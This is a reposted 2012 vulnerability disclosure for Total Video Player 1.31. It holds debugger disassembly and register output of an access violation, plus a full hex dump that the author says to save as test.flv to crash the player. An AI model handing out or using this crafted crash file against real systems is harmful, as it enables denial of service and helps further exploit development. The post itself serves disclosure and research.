|
Total Video Player V1.31 [.flv] vuln after exception handling
|
|
来源:fb.me/Ayrbyte 作者:Ayrbyte 发布时间:2012-06-12
|
|
/*##############################################################################################
title : Total Video Player V1.31 [.flv] vuln after exception handling
author : Ayrbyte
link : http://www.softpedia.com/get/Multimedia/Video/Video-Players/Total-Video-Player.shtml
tested on : windows 7
fb : fb.me/Ayrbyte
greetz to : thank's to Zax Oktav, Andy Oioi, Rizaldy Ahmad, Rezza Aulia Pratama, Cloud Sky,
Zet Dot Exe and all b-compi family ^_^
We are B-Compi... We are Hacker... We Are Proud...!
################################################################################################
aplication be crash after load 2 times test.flv
first loading test.flv then error message will appear "Cannot init video render"
after that tvp appear "The file can not be played" then when you load one again test.flv
program will be crash
[diasembly]
ntdll!KiRaiseUserExceptionDispatcher:
77016498 55 push ebp
77016499 8bec mov ebp,esp
7701649b 83ec50 sub esp,50h
7701649e 8944240c mov dword ptr [esp+0Ch],eax
770164a2 64a118000000 mov eax,dword ptr fs:[00000018h]
770164a8 8b80a4010000 mov eax,dword ptr [eax+1A4h]
770164ae 890424 mov dword ptr [esp],eax
770164b1 c744240400000000 mov dword ptr [esp+4],0
770164b9 c744240800000000 mov dword ptr [esp+8],0
770164c1 c744241000000000 mov dword ptr [esp+10h],0
770164c9 54 push esp
770164ca e839000000 call ntdll!RtlRaiseException (77016508)
770164cf 8b0424 mov eax,dword ptr [esp] ss:0023:0012c510=c0000008; <<--Access Violation
770164d2 8be5 mov esp,ebp
770164d4 5d pop ebp
770164d5 c3 ret
[register]
eax=c0000008 ebx=00000000 ecx=0012c564 edx=77016498 esi=023408d0 edi=02340a40
eip=770164cf esp=0012c510 ebp=0012c560 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
(ed8.548): Invalid handle - code c0000008 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
ntdll!KiRaiseUserExceptionDispatcher+0x37:
770164cf 8b0424 mov eax,dword ptr [esp] ss:0023:0012c510=c0000008 <<--
Access Violation. Unhandle exception in tvp.exe (NTDLL.DLL):0xC0000005:
################################################################################################
making file test.avi
open hex editor, put this hexa without "" to hex editor then save as test.flv
"46 4C 56 01 05 00 00 00 09 00 00 00 00 12 00 03 4B 00 00 00 00 00 00 00 02 00 0A 6F 6E 4D 65 74 61 44 61 74 61 08 00 00 00 0F 00 08 64 75 72 61 74 69 6F 6E 00 40 7E 02 39 58 10 62 4E 00 09 73 74 61 72 74 74 69 6D 65 00 00 00 00 00 00 00 00 00 00 0D 74 6F 74 61 6C 64 75 72 61 74 69 6F 6E 00 40 7E 02 39 58 10 62 4E 00 05 77 69 64 74 68 00 40 84 00 00 00 00 00 00 00 06 68 65 69 67 68 74 00 40 76 60 00 00 00 00 00 00 0D 76 69 64 65 6F 64 61 74 61 72 61 74 65 00 40 67 3F 38 C0 CF 6F BC 00 0D 61 75 64 69 6F 64 61 74 61 72 61 74 65 00 40 5B 3A 7B BE 49 D4 2B 00 0D 74 6F 74 61 6C 64 61 74 61 72 61 74 65 00 40 72 FA 4E 73 6C FF 90 00 09 66 72 61 6D 65 72 61 74 65 00 40 3D F7 E9 63 92 14 FC 00 0A 62 79 74 65 6C 65 6E 67 74 68 00 41 71 61 57 40 00 00 00 00 0D 63 61 6E 73 65 65 6B 6F 6E 74 69 6D 65 01 01 00 0A 73 6F 75 72 63 65 64 61 74 61 02 00 20 42 37 36 36 32 32 34 30 37 48 48 31 33 31 31 37 36 36 30 32 37 33 36 39 36 39 38 00 00 00 00 00 00 04 70 75 72 6C 02 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 70 6D 73 67 02 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0E 68 74 74 70 68 6F 73 74 68 65 61 64 65 72 02 01 00 6F 2D 6F 2E 70 72 65 66 65 72 72 65 64 2E 70 74 74 65 6C 6B 6F 6D 2D 62 74 68 31 2E 76 36 2E 6C 73 63 61 63 68 65 36 2E 63 2E 79 6F 75 74 75 62 65 2E 63 6F 6D 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 03 56 09 00 00 2B 00 00 00 00 00 00 00 17 00 00 00 00 01 4D 40 1E FF E1 00 17 67 4D 40 1E 92 42 01 40 5F F3 42 00 00 07 D0 00 01 D3 74 1E 2C 5C 90 01 00 04 68 EE 3C 80 00 00 00 36 08 00 00 04 00 00 00 00 00 00 00 AF 00 12 10 00 00 00 0F 09 00 7E 93 00 00 00 00 00 00 00 17 01 00 00 00 00 00 7E 8A 65 88 80 80 0F FF 99 73 7B 80 3F 97 AF F9 03 CF A8 00 5A 0E 2C 83 53 FF 00 00 00 00 00 00 00 20 00 5F 07 0D 39 7D 55 85 97 BA FA F1 AB B8 E8 16 D4 0A 00 00 00 96 EF 55 28 DC 54 E4 8D 6B A3 36 55 C4 B8 95 1C 7D C9 87 00 00 01 3B 09 00 00 2E 07 53 6A 00 00 00 00 27 01 00 00 00 00 00 00 25 41 9A 48 95 90 9F FA 58 04 12 3A E9 97 B4 5B C3 33 EE FC 0E 7C 6D FC 1D 14 08 25 9C 3D 97 50 00 00 08 57 3F 64 00 00 00 39 09 00 00 30 07 53 8B 00 00 00 00 27 01 00 00 00 00 00 00 27 41 9A 4C 9D 90 9F FA 58 04 12 3C 3A AA 66 CC 20 95 2E FA B2 7D 17 7B DB 94 1D 75 55 3D 97 50 00 00 08 5A 98 6B E3 79 00 00 00 3B 09 00 00 05 07 53 8B 00 00 00 00 17 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10"
comment : untuk yang lihat ini, sory yo manual dulu soalnya kompilerku lagi cacad ^_^
##############################################################################################*/
|
| |
|
[ 推荐]
[ 评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
| |
|
|
 |
|
推荐广告 |
|
|
|
|
|
